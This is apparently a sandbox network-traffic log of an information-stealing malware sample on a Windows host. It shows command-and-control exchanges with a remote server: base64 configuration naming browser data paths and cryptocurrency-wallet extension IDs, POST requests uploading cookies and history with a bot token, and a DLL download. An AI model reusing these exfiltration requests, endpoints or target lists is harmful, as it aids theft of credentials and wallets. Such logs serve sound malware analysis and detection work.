Dec 10, 2024 00:42:02.972871065 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 10, 2024 00:42:02.972945929 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 10, 2024 00:42:02.974572897 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECF Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="message"plugins------JEHIJJKEGHJJKECBKECF--
Dec 10, 2024 00:42:03.421025038 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 10, 2024 00:42:03.421039104 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 10, 2024 00:42:03.421050072 CET	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 10, 2024 00:42:03.421308041 CET	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Dec 10, 2024 00:42:03.421319008 CET	1236	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Dec 10, 2024 00:42:03.421328068 CET	1164	IN	Data Raw: 56 32 46 73 62 47 56 30 66 47 68 6c 5a 57 5a 76 61 47 46 6d 5a 6d 39 74 61 32 74 72 63 47 68 75 62 48 42 76 61 47 64 73 62 6d 64 74 59 6d 4e 6a 62 47 68 70 66 44 46 38 4d 48 77 77 66 46 68 32 5a 58 4a 7a 5a 53 42 58 59 57 78 73 5a 58 52 38 61 57 Data Ascii: V2FsbGV0fGhlZWZvaGFmZm9ta2trcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGp
Dec 10, 2024 00:42:03.432210922 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="message"fplugins------JDAFHCGIJECFHIDGDBKE--
Dec 10, 2024 00:42:03.877968073 CET	335	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:03 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 10, 2024 00:42:04.236251116 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI Host: 185.215.113.206 Content-Length: 7559 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:42:04.236489058 CET	7559	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 Data Ascii: ------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 10, 2024 00:42:05.316096067 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:05.612843990 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:06.054338932 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:05 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 10, 2024 00:42:06.054436922 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 10, 2024 00:42:06.058433056 CET	248	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Dec 10, 2024 00:42:06.059287071 CET	1236	IN	Data Raw: 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 2a f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 04 02 00 00 00 89 34 24 e8 07 f6 0a 00 83 ec 0c 89 c5 e9 bb fe ff ff 8d Data Ascii: \|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=xgat9$pa\|aQtD$pa$aRRt$xga$a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49749	185.215.113.206	80	7288	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:42:15.295196056 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJK Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------KEGIDHJKKJDGCBGCGIJK--
Dec 10, 2024 00:42:17.112795115 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:17.246860981 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:42:17.246901035 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 Data Ascii: ------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------FHIEBKKFHIEGCAKECGHJContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 10, 2024 00:42:18.296518087 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:18.313792944 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 44 42 47 44 41 46 48 4a 44 48 49 44 47 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIIDBGDAFHJDHIDGDGIIContent-Disposition: form-data; name="file"------GIIDBGDAFHJDHIDGDGII--
Dec 10, 2024 00:42:19.254358053 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
